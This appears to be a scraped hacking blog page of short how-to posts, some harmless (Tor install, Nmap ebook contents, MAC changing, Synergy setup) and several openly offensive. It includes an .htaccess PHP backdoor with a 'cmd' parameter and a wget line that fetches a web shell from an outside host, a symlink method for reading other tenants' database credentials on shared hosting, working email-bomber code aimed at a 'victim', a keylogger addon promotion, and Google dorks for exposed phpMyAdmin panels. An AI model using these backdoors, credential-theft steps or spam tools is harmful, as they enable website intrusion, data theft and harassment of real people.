What is 'write-protection'?


'Write protection' is a type of security measure which places a 'lock' on digital files. The locking action prevents modifications from being made to the stored data, and is a simple way to avoid changes being made to important files without your permission. So far, so logical; but occasionally these security measures can backfire, essentially locking you out of your own home.
Write-protection is often a physical (rather than a virtual) security measure; lifting it usually involves flicking a switch on the mass storage device. The trick is to first find the switch, and or to change the virtual settings on your computer to accept the physical changes.


Insert the memory stick into the computer
Step 1:Go to My Computer and under Devices with Removable Storage look for your card reader
Step 2:Right-click on it and click Properties In the pop-up box, sometimes there's an option to Remove write-protection. Change the status of this option and try again.

Still not working??

Remove your memory stick from the drive
Step 1:Click Start > Run... In the box type regedit and press OK
Step 2:A new window will appear. Goto:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies
Step 3:If you can't locate StorageDevicePolicies then you will need to create this folder
Step 4:Right-click on Control and click on New > Key. Name this StorageDevicePolicies
Step 5:Right-click on the new folder you created called StorageDevicePolicies and click New >DWORD Value.
Step 6:Name this WriteProtect
Step 7:Double-click on Write Protect and change the Value Data to 0 and then click OK
Step 8:Close the Registry Editor and insert the memory stick into your computer



READMORE
 

Installing TOR browser



What is Tor?

Tor is free software and an open network that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security. This guide guides your through installing tor in Kali Linux.

Installing Tor in Kali Linux:

Step1: Downloading and Running Tor bundle
After Downloading the architecture-appropriate file above, save it anywhere, then run one of the following two commands to extract the package archive

Step 2:TO extract the Package use this command in terminal
----------------------------------------------------------------------
tar -xvzf tor-browser-gnu-linux-i686-2.3.25-15-dev-LANG.tar.gz
----------------------------------------------------------------------

If you useing 64-bit version use this Command

----------------------------------------------------------------------
tar -xvzf tor-browser-gnu-linux-x86_64-2.3.25-16-dev-LANG.tar.gz
-----------------------------------------------------------------------

Step 3:Once that’s done, switch to the Tor browser directory by running

Step 4:To run the Tor Browser Bundle, execute the start-tor-browser script:

-----------------------------------------------------------------------
./start-tor-browser
-----------------------------------------------------------------------









READMORE
 

NMAP EBook



Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in twelve movies, including The Matrix Reloaded, Die Hard 4, Girl With the Dragon Tattoo, and The Bourne Ultimatum.

Nmap is ...

Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackers announcement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel on Freenode or EFNet.
Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities

About EBook:

Introduction....................................................................................... 15
Section 1: Installing Nmap .................................................................. 19
Section 2: Basic Scanning Techniques .................................................. 33
Section 3: Discovery Options .............................................................. 45
Section 4: Advanced Scanning Options ................................................ 65
Section 5: Port Scanning Options ........................................................ 79
Section 6: Operating System and Service Detection ............................. 89
Section 7: Timing Options .................................................................. 97
Section 8: Evading Firewalls .............................................................. 115
Section 9: Output Options ................................................................ 127
Section 10: Troubleshooting and Debugging ...................................... 135
Section 11: Zenmap .......................................................................... 147
Section 12: Nmap Scripting Engine (NSE)........................................... 161
Section 13: Ndiff .............................................................................. 171
Section 14: Tips and Tricks ................................................................ 177
Appendix A - Nmap Cheat Sheet ....................................................... 187
Appendix B - Nmap Port States ......................................................... 191
Appendix C - CIDR Cross Reference ................................................... 193
Appendix D - Common TCP/IP Ports .................................................. 195
6
7
Table of Contents
Introduction....................................................................................... 15
Conventions Used In This Book ............................................................. 18
Section 1: Installing Nmap .................................................................. 19
Installation Overview ............................................................................ 20
Installing Nmap on Windows ................................................................ 21
Installing Nmap on Unix and Linux systems .......................................... 25
Installing Precompiled Packages for Linux ........................................ 25
Compiling Nmap from Source for Unix and Linux ............................ 26
Installing Nmap on Mac OS X ................................................................ 29
Section 2: Basic Scanning Techniques .................................................. 33
Basic Scanning Overview ....................................................................... 34
Scan a Single Target............................................................................... 35
Scan Multiple Targets ............................................................................ 36
Scan a Range of IP Addresses ................................................................ 37
Scan an Entire Subnet ........................................................................... 38
Scan a List of Targets ............................................................................. 39
Scan Random Targets ............................................................................ 40
Exclude Targets from a Scan.................................................................. 41
Exclude Targets Using a List .................................................................. 42
Perform an Aggressive Scan .................................................................. 43
Scan an IPv6 Target ............................................................................... 44
Section 3: Discovery Options .............................................................. 45
Discovery Options Overview ................................................................. 46
Don’t Ping ............................................................................................. 47
Ping Only Scan ....................................................................................... 48
TCP SYN Ping ......................................................................................... 49
TCP ACK Ping ......................................................................................... 50
UDP Ping ............................................................................................... 51
SCTP INIT Ping ....................................................................................... 52
8
ICMP Echo Ping ..................................................................................... 53
ICMP Timestamp Ping .......................................................................... 54
ICMP Address Mask Ping ...................................................................... 55
IP Protocol Ping .................................................................................... 56
ARP Ping ............................................................................................... 57
Traceroute ............................................................................................ 58
Force Reverse DNS Resolution.............................................................. 59
Disable Reverse DNS Resolution ........................................................... 60
Alternative DNS Lookup Method.......................................................... 61
Manually Specify DNS Server(s) ........................................................... 62
Create a Host List .................................................................................. 63
Section 4: Advanced Scanning Options ................................................ 65
Advanced Scanning Functions Overview .............................................. 66
TCP SYN Scan ........................................................................................ 67
TCP Connect Scan ................................................................................. 68
UDP Scan .............................................................................................. 69
TCP NULL Scan ...................................................................................... 70
TCP FIN Scan ......................................................................................... 71
Xmas Scan ............................................................................................. 72
Custom TCP Scan .................................................................................. 73
TCP ACK Scan ........................................................................................ 74
IP Protocol Scan .................................................................................... 75
Send Raw Ethernet Packets .................................................................. 76
Send IP Packets ..................................................................................... 77
Section 5: Port Scanning Options ........................................................ 79
Port Scanning Options Overview .......................................................... 80
Perform a Fast Scan .............................................................................. 81
Scan Specific Ports ................................................................................ 82
Scan Ports by Name .............................................................................. 83
Scan Ports by Protocol .......................................................................... 84
9
Scan All Ports......................................................................................... 85
Scan Top Ports ....................................................................................... 86
Perform a Sequential Port Scan ............................................................ 87
Section 6: Operating System and Service Detection ............................. 89
Version Detection Overview ................................................................. 90
Operating System Detection ................................................................. 91
Submitting TCP/IP Fingerprints ............................................................. 92
Attempt to Guess an Unknown Operating System ............................... 93
Service Version Detection ..................................................................... 94
Troubleshooting Version Scans ............................................................. 95
Perform an RPC Scan ............................................................................. 96
Section 7: Timing Options .................................................................. 97
Timing Options Overview ..................................................................... 98
Timing Parameters ................................................................................ 99
Timing Templates ................................................................................ 100
Minimum Number of Parallel Operations........................................... 101
Maximum Number of Parallel Operations .......................................... 102
Minimum Host Group Size .................................................................. 103
Maximum Host Group Size ................................................................. 104
Initial RTT Timeout ............................................................................. 105
Maximum RTT Timeout ...................................................................... 106
Maximum Retries ................................................................................ 107
Set the Packet TTL ............................................................................... 108
Host Timeout ...................................................................................... 109
Minimum Scan Delay .......................................................................... 110
Maximum Scan Delay .......................................................................... 111
Minimum Packet Rate ......................................................................... 112
Maximum Packet Rate ........................................................................ 113
Defeat Reset Rate Limits ..................................................................... 114
10
Section 8: Evading Firewalls .............................................................. 115
Firewall Evasion Techniques Overview ............................................... 116
Fragment Packets ............................................................................... 117
Specify a Specific MTU ....................................................................... 118
Use a Decoy ........................................................................................ 119
Idle Zombie Scan ................................................................................ 120
Manually Specify a Source Port Number ............................................ 121
Append Random Data ........................................................................ 122
Randomize Target Scan Order ............................................................ 123
Spoof MAC Address ............................................................................ 124
Send Bad Checksums .......................................................................... 125
Section 9: Output Options ................................................................ 127
Output Options Overview .................................................................. 128
Save Output to a Text File................................................................... 129
Save Output to a XML File .................................................................. 130
Grepable Output ................................................................................ 131
Output All Supported File Types......................................................... 132
Display Scan Statistics ......................................................................... 133
133t Output ........................................................................................ 134
Section 10: Troubleshooting and Debugging ...................................... 135
Troubleshooting and Debugging Overview ........................................ 136
Getting Help ....................................................................................... 137
Display Nmap Version ......................................................................... 138
Verbose Output .................................................................................. 139
Debugging .......................................................................................... 140
Display Port State Reason Codes ........................................................ 141
Only Display Open Ports ..................................................................... 142
Trace Packets ...................................................................................... 143
Display Host Networking Configuration ............................................. 144
Specify Which Network Interface to Use ........................................... 145
11
Section 11: Zenmap .......................................................................... 147
Zenmap Overview ............................................................................... 148
Launching Zenmap .............................................................................. 149
Basic Zenmap Operations ................................................................... 150
Zenmap Results ................................................................................... 151
Scanning Profiles ................................................................................. 152
Profile Editor ....................................................................................... 153
Viewing Open Ports ............................................................................ 154
Viewing a Network Map ..................................................................... 155
Saving Network Maps ......................................................................... 156
Viewing Host Details ........................................................................... 157
Viewing Scan History .......................................................................... 158
Comparing Scan Results ...................................................................... 159
Saving Scans ........................................................................................ 160
Section 12: Nmap Scripting Engine (NSE)........................................... 161
Nmap Scripting Engine Overview........................................................ 162
Execute Individual Scripts ................................................................... 163
Execute Multiple Scripts ..................................................................... 164
Script Categories ................................................................................. 165
Execute Scripts by Category ................................................................ 166
Execute Multiple Script Categories ..................................................... 167
Troubleshoot Scripts ........................................................................... 168
Update the Script Database ................................................................ 169
Section 13: Ndiff .............................................................................. 171
Ndiff Overview .................................................................................... 172
Scan Comparison Using Ndiff .............................................................. 173
Ndiff Verbose Mode ............................................................................ 174
XML Output Mode .............................................................................. 175
Section 14: Tips and Tricks ................................................................ 177
Tips and Tricks Overview .................................................................... 178
12
Combine Multiple Options ................................................................. 179
Scan Using Interactive Mode .............................................................. 180
Runtime Interaction ........................................................................... 181
Remotely Scan Your Network ............................................................. 182
Wireshark ........................................................................................... 183
Scanme.Insecure.org .......................................................................... 184
Nmap Online Resources ..................................................................... 185
Appendix A - Nmap Cheat Sheet ....................................................... 187
Appendix B - Nmap Port States ......................................................... 191
Appendix C - CIDR Cross Reference ................................................... 193
Appendix D - Common TCP/IP Ports .................................................. 195








READMORE
 

Dmitry Deepmagic Information Gathering Tool in kali linux


DMitry

(Deepmagic Information Gathering Tool) is a Linux Command Line Application coded in C language.
DMitry has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more. 

The information are gathered with following methods:

*        Perform an Internet Number whois lookup.
*        Retrieve possible uptime data, system and server data.
*         Perform a SubDomain search on a target host.
*        Perform an E-Mail address search on a target host.
*        Perform a TCP Portscan on the host target.
*        A Modular program allowing user specified modules

open dmitry in Kali Linux

Application ==> Kali Linux ==> Information gathering ==> Live Host Identification ==> dmitry



Syntax:

dmitry -(Switches)  (victim) 

Example:

dmitry -p 192.168.1.5

-o  


This command is used to save output specify with a given name our output the default is host.txt you could name it anything you want.
Syntax: dmitry –s domain –o filename
Ex:dmitry –s google.com –o filename

-i


Thiscommand is used to perform a whois lookup of the IP address of a host, this tells us that if we only no the name that dmitry will find the IP for us.
Syntax:         dmitry –i IP address
Ex:               dmitry –i 192.168.71.128

-w


This command is used to perform a whois lookup on the domain name of a host.
Syntax:         dmitry –w domain
Ex:               dmitry –w google.com

-n


This command is used to give us Netcraft.com information on a host.
Syntax:         dmitry –n domain
Ex:               dmitry –n facebook.com

-s


This command is used to  performs a search for possible subdomains.
Syntax:         dmitry –s domain
Ex:               dmitry –s yahoo.com

-e


This command is used to perform a search for possible email addresses.
Syntax:         dmitry –e domain
Ex:               dmitry –e yahoo.com

-P

This command is used to perform a TCP port scan on a host.
Syntax:         dmitry –p IP address
Ex:               dmitry –p 192.1681.10

-f

This command is used to  perform a TCP port scan on a host showing output reporting filtered ports (useful if there is a firewall in place). For running successfully this command -p must be set.
Syntax:        dmitry –pf domain
Ex:              dmitry –pf google.com
























READMORE
 

Alert: Tor Browser app in the Apple Store is fake, spreading Malwares and Spywares! Do not download!

Tor Browser app in the Apple app store is fake and have been found spreading adware and spywares.



According to the official website of Tor Browser, the Browser app available in Apple store on iTunes is fake and has nothing to do with the official version. The developers of Tor said that:

Tor Browser in the Apple App Store is fake. It’s full of adware and spyware. Two users have called to complain. We should have it removed.

The company has been complaining to Apple Inc. for over two months. However, Apple didn’t removed the app until now.

READMORE
 

Xenotix Keylogger For Firefox



This is a firefox addon which keylogs every thing. Logs can Be retrieved By pressing “alt + x” . A very simple and effective addon.




READMORE
 

Create Backdoor in .htaccess



We Creating  Backdoor in .htaccess(Hypertext access)

1: Go public_html in shell and need to edit the .htaccess.

                                                             PHP Codes
-------------------------------------------------------
<?php
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess

# <?php passthru($_GET['cmd']); ?>
-------------------------------------------------------
And need to type CMD Commands like this

yoursite.com/.htaccess?cmd=

For Shell Upolad

yoursite.com/.htaccess?cmd=wget -O xyz.php http://yourothersitewithshell/yourshell.txt


Now you can access your shell..


READMORE
 

Change Mac Address in Backtrack



Today i am going to show you how to change mac address in backtrack..

What Is Mac Address ?

A media access control address (MAC address) is a unique identifier assigned to network interfaces for communications on the physical network segment. MAC addresses are used as a network address for most IEEE 802 network technologies, including Ethernet. Logically, MAC addresses are used in themedia access control protocol sublayer of the OSI reference model.

Well changing mac address in Backtrack is pretty easy...

1: Open Console than type ifconfig eth0 down
2: Now type , macchanger -r eth0
3: ifconfig eth0 up

1.1: Command - it will disable eth0
2.1: Command - it will generate random Mac Address
3.1: Command - it will enable the eth0 Grin

Change Mac Address To Whatever You Want-

Change Mac Address Of your Choice-
Open Terminal and type -
4: ifconfig eth0 down
5:type in terminal macchanger --mac your MAc address with : : : example 11:22:33:44:55 eth0
   machchanger --mac 11:22:33:44:55 eth0
6: ifconfig eth0 up

READMORE
 

Speed Up Internet Connection Response Time


I have a secret to increase your internet connectivity response time, or at least lower the delay.This works with games, however I can still notice a significant change of browsing experience

1: Open CMD you can do this by pressing (windows) key + R and type cmd in the text box. Type ipconfig in cmd.
2: Open Regedit by pressing (windows) key + R and type regedit in the text box.
3. Locate to Regedit Directory:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces


4: In cmd, after typing ipconfig you will get this that is where you will find your ip address.


5: In Regedit, you need to find the interface with that (your) IP address.


6: In that directory (you can also do this to all interfaces you will see) you will add a new DWORD (32-bit) Value in Decimal and name it (CASE SENSITIVE) TcpAckFrequency and assign value 1 by double clicking it. Add another value and name it TCPNoDelay and assign value 1. All of them are case sensitive.
After that, you need to reboot for sure. 






READMORE
 

Best E-Books on Hacking- FREE


I am sharing here some of the best E-Books on different topics like hacking, virus and malware, cryptography, forensics, cyber security etc,These E-Books are available on internet for free. But I thought I would put them together here. I am sharing them here for ABSOLUTELY FREE, just download them




























































































READMORE
 

what is symlink

                               what is symlink





Symlink is basically a linux function that allow you to make shortcut (reference) to another file or directory. In linux servers (shared hostings) there are many users in site and they divide hosting space in different
parts. okay if you see with hackers eye.. how will they use it for evil purpose ??
well when a hacker hacks into a website and shell it and get full access to that particular website and its user 
he can only make change in specific disc space that is granted to that particular user. He have no access to other user's space 
but he can use this function to read sensitive files i.e database configuration files. 
example : me and You have websites on a same server you have installed a wordpress cms on your website
we are on same server but We can Try Symlinking your wordpress config file and 
can get details of your database user,password and  can login in mysql server easily. 

suppose your website directory is

/home/target/public_html/
 and mine is
/home/Cyber-Warriors/public_html/

and wordpress has default config file here ===> /public_html/wp-config.php
and it includes your database information 
okay now but question is how I gonna Get your database information in that file when I just cant access your disc space?

we can try symlink so what can i do is

execute this command:

ln -s /home/target/public_html

(but execute this command in some new folder because we also gonna write some htaccess configuration code that will allow us to read all files in .txt format)
now we will see another folder created in same directory where we executed code but still we cant access it
we need to add a configuration files that will tell the server how to open this:
------------------------------------------------------
Options all
DirectoryIndex Sux.html
AddType textplain .log
AddType textplain .php
AddType textplain .conf
AddType textplain .sql
AddHandler server-parsed .php
AddHandler txt .html
Require None
Satisfy Any
------------------------------------------------------
what will this code do ? this will treat all .log, php, conf, sql files as plain text .
okay now you can access target user directory by using this
http://yourwebsite/yourfolder/symlinkdir/

you will see all files of your target directory , now just read config file and get database user
 and password and login in mysql server
with his account and can add new admin to his website from there

                                       how can you patch this ??

we can change permissions of ln for non root users by issuing command
chmod 760 /bin/ln  or we can change php.ini file of main server and disable proc_open and symlink function from there.



READMORE
 

How to make an email Bomber

                      How to make an email Bomber



What you will need

1. Microsoft Visual Basic 2010
You Can Download Microsoft Visual Basic 2010  Download!!
So let's Start
1:Open up Visual Basic 2008
2:Create a New Windows Form Application and name it anything you want for example I have named it Cyber-Bomb Then Click OK.
3:Click the window that looks like a new window. Go to the settings on the right scroll down to the bottom until you find
Text. edit this To What you want to appear on the top of your application for Example I Have Called Mine Cyber-Bomb
4:Now it is time for you too design and make the Application. Add 3 Buttons named Start-Stop and Exit You Can Change
The Names By Clicking them and then start typing.
5:Now Add 5 Text-boxes Named
(5.1):Google-mail Username
(5.2):Google-mail password
(5.3):Victims Email
(5.4).Email subject
(5.5).Email message (Make the 5th Text-Box multiline)
6:Now Add One timer.(Do NOT edit anything in this)
7:Add A Label click it and type the Number 0 . ?
8:If you have followed It so far accurately It should look something like this.
9:OK. We have now done the fun bit designing. Now it is time to code it all so it will all work.
10:Double Click The start button and type in
Code:
Timer1start()
11:Double Click The Stop button and type in
Code:
Timer1.stop()
12:Double Click The Exit button and type in
Code:
End
13:Go right to the top of the coding page and above ?Public Class? Type in
Code:
Imports System.Net.Mail
14)If you have followed it correctly so far it should look something like this
15)Now Double click the Timer and type in
Code:
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress(TextBox1.Text)
MyMailMessage.To.Add(TextBox3.Text)
MyMailMessage.Subject = (TextBox4.Text)
MyMailMessage.Body = TextBox5.Text
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text)
SMTPServer.EnableSsl = True
Label1.Text = Val(Label1.Text + 1)
SMTPServer.Send(MyMailMessage)
16)Now once you have done that.
17)Now Press F5 or click the green Arrow on the top toolbar to Debug and run/test.
18)This only works with googlemail as it uses there SMTP Server. This is nothing special hwo ever it does send mass
emails to the victim and google does banna ccounts that are caught spamming like this so you may be required to make
a fair few accounts.
20)This is very basic as you can see but you can mess around with styles and jazz it up a bit for your liking.

READMORE
 

Find Phpmyadmin without login and hack website

         Find Phpmyadmin without login and hack website




Search in google

intitle : phpmyadmin inurl:server_processlist.php
intitle : phpmyadmin inurl:tbl_operations.php
intitle : phpmyadmin inurl:server_collations.php
intitle : phpmyadmin inurl:server_databases.php
intitle : phpmyadmin inurl:server_export.php
intitle : phpmyadmin inurl:server_engines
READMORE
 

Share a keyboard and mouse with multiple computers using only software

    Share a keyboard and mouse with multiple computers using only software


Hello! Friends NightStalker Here today i show you how to control a multiple pc withe a help of of simple software so if you have more then one so stop jumping from one keyboard and mouse combination to another every time you switch computers. Control multiple computers using just one set – without the need for extra hardware. QuickSynergy for Linux and Mac, working with Synergy for Windows, means there’s no combination of systems that can’t be controlled this quickly and easily. If there’s more than one computer on your desk then you need to check this out.
Multiple monitors are intuitive – you move your mouse from one screen to another and simply continue controlling. But what if your desk has multiple computers on it? Can you move your mouse from one computer to another, then work on that? And what about copy/paste functionality? That, as it turns out, can be just as simple as using multiple monitors – even if you’re using different operating systems.

So let's the fun begin...!!! 

1: Go to Synergy's website and click the Download link. Either make a donation or click Continue. Download the correct installer for your operating system. Choose 32-bit if you
aren’t sure which version of Windows you have.  

2: Run the file you just downloaded. Agree to the terms and conditions, then click next to install the software. You’ll need to download and install the appropriate version of the Synergy software on each computer you intend to use with your shared mouse and keyboard.


3: Log in to your router via your web browser. Look for a page which lists all the devices connected to the router. Identify your 'Master' computer, and ensure its IP address is set to be static rather than dynamic, with a value such as 192.168.1.10.

4 :Still within the router’s interface, another option will allow you to open ports for certain applications. Synergy uses 24800 by default, so follow your router's manual or online
help to open this port, enabling both TCP and UDP protocols for this port and ensure it is applied to your Master computer (usually you select it from a list or enter its IP address). Save the changes.



5: On the Master computer, launch Synergy, then tick the box labelled Server. Click Configure Server. For each client, drag the monitor icon from the top right into the main
window and arrange monitors in the order in which they’re positioned on your desk. Double click each icon, then give it a unique screen name. Click OK, then click Start.


6: On each client computer, open the Synergy application, and go to the settings and ensure it has the same screen name you chose in the last step. Tick the box next to Client.
Enter your master computer’s IP address. Then click Start. If all is well, it should say ‘connected to server’ and you can move your mouse between your computers and use the
keyboard to type.







READMORE